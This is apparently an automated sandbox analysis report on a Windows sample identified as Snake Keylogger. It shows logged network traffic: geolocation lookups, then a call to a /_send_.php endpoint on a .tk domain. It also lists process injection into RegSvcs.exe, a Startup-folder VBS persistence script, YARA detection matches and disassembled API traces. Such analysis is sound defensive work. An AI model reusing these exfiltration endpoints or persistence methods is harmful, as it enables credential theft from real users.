2024-04-08 11:59:27 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49759	172.67.177.134	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:28 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 11:59:29 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79470 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdkoERRrGSwGXy4ojNr%2BESJxU5leTMOTkZnyFKUDEf1aC3cEfHNGvo%2FzhStZVmE1FwoDNYZWebVbkcnycXbYnIZWe4e0JKdiGR1K%2FHZu3MIutFzqj09PHxpvdi1f1CxGBCSIjb0H"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8712176eda84da05-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:29 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49761	172.67.177.134	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:29 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:30 UTC	718	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79471 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xogmfyYtQETTEHFUhkA2rdJCeQ%2BejnJ31QBu3%2FU%2B98Kzc%2B6Ig3FPxxKpys2JoF67ZabHX%2BExL%2FgOC4jIauTH%2BtN90P71jiQnMDNKhye%2FFaqxyg6PCxNQXzvyjpwZLOOlOQC%2BPGP2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 871217757d9d21eb-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:30 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	172.67.177.134	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:30 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-08 11:59:31 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79472 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUisl7%2BlgOIxBDzwd7yLt4c0mJOOucFR5Sb%2BuyzHuEnHxjtF895T4%2BkJwMoZSvsCCGiPz9yAD0VUkuh5uT1VEyhL8OY6VRaceK2g0at4xGO48gTEJv3iD5xyjGMQ3iWttwHWTQTn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8712177b8d3921d9-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:31 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49765	172.67.177.134	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:31 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 11:59:32 UTC	700	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79473 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZgMG1ZfHjTlclqCa9lTYTUuSepLQOz9V6q2evNO56wBa8n2FwXMNgeZBYRpxLqKzfTCtTdri0l2W5B4psLwbvmrZ9puWwj4ankqMNbfVZCLoDKBvrrkpHRX7gZOtW7rAufneqme"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8712178159ee21df-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:32 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49767	172.67.177.134	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:34 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-08 11:59:34 UTC	712	IN	HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 11:59:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 79475 Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aSVmLzNS30BwXq%2FX1zpyBiPR1cluInP4D8qPPegpDnd0eS55rx89iG5RF6X5AxwrQgbmpYsQQdo%2BYnoj4feTv1H%2FT3mhgYjevbeavhacfhcJ%2FiZm2pc3LgJ0ThnRs9D%2ByTalqtv%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 871217915bbd370b-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 11:59:34 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-08 11:59:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49768	104.21.27.85	443	3844	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-08 11:59:34 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-04-08 12:00:06 UTC	741	IN	HTTP/1.1 522 Date: Mon, 08 Apr 2024 12:00:05 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj2p%2BAfDACpJoanL2JZmZc9bnzw3e8yteSg10c3wPQRnApIPW54wTR87HTk9jBe%2BOM6y%2FfiH5eK%2F86yrbcAtPYlQUSZUtHN%2FpfQDfThOT8mDa0fbgmCe%2BC4gxmC0x2vL0bdb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 87121794ed6e31f5-MIA alt-svc: h3=":443"; ma=86400
2024-04-08 12:00:06 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Target ID:	0
Start time:	13:56:53
Start date:	08/04/2024
Path:	C:\Users\user\Desktop\PsBygexGwH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PsBygexGwH.exe"
Imagebase:	0x120000
File size:	1'130'496 bytes
MD5 hash:	222D05295014F8974D6E358E1507770E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:59:08
Start date:	08/04/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PsBygexGwH.exe"
Imagebase:	0x2c0000
File size:	114'376'704 bytes
MD5 hash:	90D7DF3194AF25C7942DCDB56E8902F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:59:11
Start date:	08/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PsBygexGwH.exe"
Imagebase:	0x190000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	13:59:21
Start date:	08/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase:	0x7ff7649f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:59:22
Start date:	08/04/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x2c0000
File size:	114'376'704 bytes
MD5 hash:	90D7DF3194AF25C7942DCDB56E8902F3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:59:24
Start date:	08/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x4e0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	3%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 001242DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0012430D

Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A

GetCurrentProcess.KERNEL32(?,001BCB64,00000000,?,?), ref: 00124422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00124429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00124454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00124466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00124474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0012447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001244A0

Strings

kernel32.dll, xrefs: 0012444F
GetNativeSystemInfo, xrefs: 00124460
|O, xrefs: 001636F8

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 094d5065cd22ef47083324d3f19056398abc39ddffeb0dfe0a247fc48ad413b5
Instruction ID: c3abdf9cafdb8af11f0f7afc84eb00937c5d64955fef9d13245526c9bbe6eb49
Opcode Fuzzy Hash: 094d5065cd22ef47083324d3f19056398abc39ddffeb0dfe0a247fc48ad413b5
Instruction Fuzzy Hash: B1A1B37690A6D4FFC715D76EBC411B57FE47B36320B084899E08593E22D33046D8CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001242A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001250AA,?,?,00000000,00000000), ref: 001242B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001250AA,?,?,00000000,00000000), ref: 001242C9
LoadResource.KERNEL32(?,00000000,?,?,001250AA,?,?,00000000,00000000,?,?,?,?,?,?,00124F20), ref: 001635BE
SizeofResource.KERNEL32(?,00000000,?,?,001250AA,?,?,00000000,00000000,?,?,?,?,?,?,00124F20), ref: 001635D3
LockResource.KERNEL32(001250AA,?,?,001250AA,?,?,00000000,00000000,?,?,?,?,?,?,00124F20,?), ref: 001635E6

Strings

SCRIPT, xrefs: 001242BF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 428f94272fb98f860a886bb5abb16683bc1f49af0b26e72421e9e5e72ac88bed
Instruction ID: 44bdfd9a02c21108202be6c8007d177767eb84ad469f7dbed625fd358e31d01f
Opcode Fuzzy Hash: 428f94272fb98f860a886bb5abb16683bc1f49af0b26e72421e9e5e72ac88bed
Instruction Fuzzy Hash: FF118E70200700FFDB218B66EC88F677BB9EBC5B51F104269F442D6650DB71DC508A70

Uniqueness

Uniqueness Score: -1.00%

Function 00162BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00122B6B

Part of subcall function 00123A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001F1418,?,00122E7F,?,?,?,00000000), ref: 00123A78

Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,001E2224), ref: 00162C10
ShellExecuteW.SHELL32(00000000,?,?,001E2224), ref: 00162C17

Strings

runas, xrefs: 00162C0B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
